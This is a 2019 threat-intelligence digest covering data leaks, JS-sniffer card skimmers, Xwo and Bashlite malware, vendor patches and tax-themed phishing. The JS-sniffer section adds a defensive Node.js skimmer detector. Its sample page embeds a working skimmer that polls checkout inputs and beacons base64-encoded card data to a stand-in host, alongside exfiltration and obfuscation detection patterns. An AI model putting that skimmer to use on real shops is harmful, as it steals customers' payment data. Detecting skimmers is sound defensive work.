
Cyware Daily Threat Intelligence, April 04, 2019


Malicious actors never fall short of malware or attack techniques when it comes to pilfering payment card details from customers, and compromising online retail sites has become a favorite choice. A recent report from cybersecurity firm Group-IB reveals that JS-sniffers, a family of malicious JavaScript injected into the pages of compromised shops, have infected 2,440 e-commerce websites worldwide to capture customers' payment data such as card numbers, names, addresses and passwords. The sniffers are tailored to retail sites built on the Magento, OpenCart, Shopify, WooCommerce and WordPress platforms.

Two massive data leaks were also observed in the past 24 hours. In one incident, two third-party companies, Cultura Colectiva and At the Pool, exposed over 540 million Facebook records through poorly protected AWS servers. In another, several unprotected Elasticsearch databases belonging to different Chinese companies leaked over 590 million resumes. Some of these misconfigured databases have since been secured, but a few are still leaking data on the internet.

In a major data breach, unauthorized access to a web application exposed the personal information of 1.3 million Georgia Tech students and staff members. The intruders had first gained access on December 14, 2018.

Top Breaches Reported in the Last 24 Hours

Over 540 million Facebook records exposed
Two third-party companies, Cultura Colectiva and At the Pool, inadvertently exposed over 540 million Facebook records through unprotected AWS servers. Both companies collect a wide range of user data from Facebook. The exposed data includes account names, likes, preferences, reactions, photos, check-ins, groups and passwords.

Over 590 million resumes leaked
Security researchers have recently discovered several unprotected Elasticsearch databases belonging to different Chinese companies, which together leaked over 590 million resumes. The first misconfigured database, containing 33 million resumes, was discovered on March 10; a second, containing 84.8 million CVs, was spotted on March 13.

Georgia Tech data breach
Unauthorized access to a Georgia Tech web application exposed the personal information of up to 1.3 million students and staff members, including names, addresses, Social Security numbers and birth dates. The institute learned of the incident on March 21; the intruders had gained access on December 14, 2018.

Top Malware Reported in the Last 24 Hours

JS-sniffers malware
Group-IB's latest report reveals that JS-sniffers have infected around 2,440 retail websites across the world. The affected sites receive nearly 1.5 million unique visitors a day, and the payment card data of those customers may have been stolen. The infection starts when the attacker injects the sniffer's JavaScript into the compromised website; the script then captures data users type into forms, such as payment card numbers, names, addresses and passwords, and sends it to the attacker.
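One way to hunt for an injected sniffer on your own checkout pages, as an added example that is not from Group-IB's report or the original post: the Node.js script below pulls every script element out of a page's HTML and flags inline scripts that both read payment-form fields and contain a network-egress primitive, plus external scripts served from hosts outside an allowlist. The sample checkout HTML, the indicator patterns, the hypothetical hosts (shop.example, cdn-stats.example.net) and the allowlist are all constructed for the example; the heuristics are assumptions and need tuning for a real site.

```javascript
// Heuristic scan of a checkout page's HTML for JS-sniffer indicators.
// Added example, not code from Group-IB or from the original post; all
// patterns, hosts and the sample page below are constructed for illustration.

// Field names a sniffer would look for (assumed list; extend for your forms).
const PAYMENT_FIELD_PATTERNS = [
  /card[_-]?number/i, /cc[_-]?num/i, /cvv2?/i, /cvc/i,
  /exp(iry|iration)?[_-]?(month|year|date)/i, /cardholder/i, /\bpan\b/i,
];
// Ways an inline script can push data off the page.
const EXFIL_PATTERNS = [
  /\bfetch\s*\(/, /XMLHttpRequest/, /navigator\.sendBeacon/,
  /new\s+Image\s*\(/, /\.src\s*=/, /WebSocket/,
];
// Ways a script hooks user input: form events, polling, bulk input harvesting.
const HOOK_PATTERNS = [
  /addEventListener\s*\(\s*['"](submit|click|change|keyup|input|blur)['"]/,
  /\.onsubmit\s*=/, /setInterval\s*\(/,
  /querySelectorAll?\s*\(\s*['"][^'"]*(input|form)/,
];
// Cheap obfuscation/encoding tricks common in skimmer payloads.
const OBFUSCATION_PATTERNS = [
  /\batob\s*\(/, /\bbtoa\s*\(/, /String\.fromCharCode/, /\\x[0-9a-f]{2}/i, /\beval\s*\(/,
];

// Pull out every <script> with its src attribute (if any) and inline body.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ index: scripts.length, src: srcMatch ? srcMatch[1] : null, body: m[2] });
  }
  return scripts;
}

// Resolve relative or absolute src to a hostname (pageOrigin is the page being scanned).
function hostOf(src, pageOrigin) {
  try { return new URL(src, pageOrigin).hostname; } catch (e) { return null; }
}

function countMatches(text, patterns) {
  return patterns.filter((p) => p.test(text)).length;
}

// Returns a list of findings; empty list means no indicators fired.
function scanHtml(html, allowedHosts, pageOrigin) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src) {
      const host = hostOf(s.src, pageOrigin);
      if (host && !allowedHosts.includes(host)) {
        findings.push({ script: s.index, reason: 'external script from unapproved host', detail: host });
      }
      continue;
    }
    const fields = countMatches(s.body, PAYMENT_FIELD_PATTERNS);
    const exfil = countMatches(s.body, EXFIL_PATTERNS);
    const hooks = countMatches(s.body, HOOK_PATTERNS);
    const obfuscation = countMatches(s.body, OBFUSCATION_PATTERNS);
    if (fields > 0 && exfil > 0 && hooks > 0) {
      findings.push({ script: s.index, reason: 'inline script reads payment fields and sends data out',
        detail: { fields, exfil, hooks, obfuscation } });
    } else if (obfuscation >= 2 && exfil > 0) {
      findings.push({ script: s.index, reason: 'obfuscated inline script with network egress',
        detail: { obfuscation, exfil } });
    }
  }
  return findings;
}

// Constructed sample: one legitimate validation script, one third-party
// script from an unapproved host, and one skimmer that polls the inputs.
const ALLOWED_HOSTS = ['shop.example'];
const PAGE_ORIGIN = 'https://shop.example/checkout';
const SAMPLE_CHECKOUT_HTML = `
<form id="checkout">
  <input name="cc_number"><input name="cvv"><input name="exp_month">
</form>
<script src="/static/checkout.js"></script>
<script>
  document.getElementById('checkout').addEventListener('submit', function (e) {
    var n = document.querySelector('[name=cc_number]').value.replace(/\\s/g, '');
    if (n.length < 13) { e.preventDefault(); alert('Invalid card number'); }
  });
</script>
<script src="https://cdn-stats.example.net/js/analytics.js"></script>
<script>
  setInterval(function () {
    var d = {};
    document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
    if (d.cc_number && d.cvv) {
      new Image().src = 'https://cdn-stats.example.net/g?' + btoa(JSON.stringify(d));
    }
  }, 2000);
</script>
`;

console.log(JSON.stringify(scanHtml(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS, PAGE_ORIGIN), null, 2));
```

On the sample page the validation script is not flagged (it touches card fields but never sends anything), while the analytics host and the polling skimmer both are. A heuristic like this complements, rather than replaces, file-integrity monitoring of the CMS install and a Content Security Policy that limits where scripts may load from and connect to.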

Xwo malware family
A new malware family dubbed Xwo has been found scanning the internet for exposed web services and default passwords. It is based on two existing malware families, Xbash and MongoLock. Its propagation method is still unknown, but researchers believe it reports the information gathered from infected machines back to its C2 server via HTTP POST requests.

Bashlite botnet updated
Security researchers have uncovered a new version of the Bashlite botnet that targets Belkin WeMo devices. The new variant adds cryptocurrency-mining and backdoor features and can deliver additional malware that removes competing botnets from infected systems. It abuses a publicly available Metasploit remote-code execution (RCE) module for propagation.

Top Vulnerabilities Reported in the Last 24 Hours

NVIDIA releases security updates
NVIDIA has released security updates fixing vulnerabilities in its Linux4Tegra (L4T) driver package for Jetson AI computing platforms. The vulnerabilities are tracked as CVE-2018-6269, CVE-2017-6278, CVE-2018-6267 and CVE-2018-6271. They could allow an attacker with basic user privileges to escalate privileges, cause a denial of service (DoS), or disclose information.

Huawei patches a bug
Huawei has patched a serious bug affecting its MateBook laptops. The bug, discovered by Microsoft, lies in the company's PCManager software, whose driver was found to behave like NSA-style malware. The flaw could allow attackers to take control of affected systems.

Mozilla and Google patch a bug
A security flaw in Mozilla Firefox and Google Chrome is believed to have affected more than 300 million users, according to Aura, a New Zealand government-owned technology company. The bug allowed attackers to access a user's sensitive photos and documents uploaded to websites. Both Google and Mozilla have confirmed the bug and released patches, so users are advised to update their browsers.

Top Scams Reported in the Last 24 Hours

Tax-themed scams
Researchers have discovered several tax-themed scams that lure users into revealing personal and financial information. One is a phishing campaign that distributed the NetWire remote-access trojan in September and October 2018 and again in early February 2019, targeting users in Australia, Canada and the United States. The emails used subject lines such as 'Notice of Outstanding Income Tax Demand', 'IRS Update for 1099 Employees', '2018 EF Tax Incentive Billing' and 'Your IRAS 2018 Tax Report'. In another campaign, NetWire was dropped via emails pretending to come from Canada Post and the New Zealand Inland Revenue Department.


tax themed scams
js sniffers malware
xwo malware
xbash malware
bashlite botnet
unprotected elasticsearch databases
unprotected aws servers

Posted on: April 04, 2019
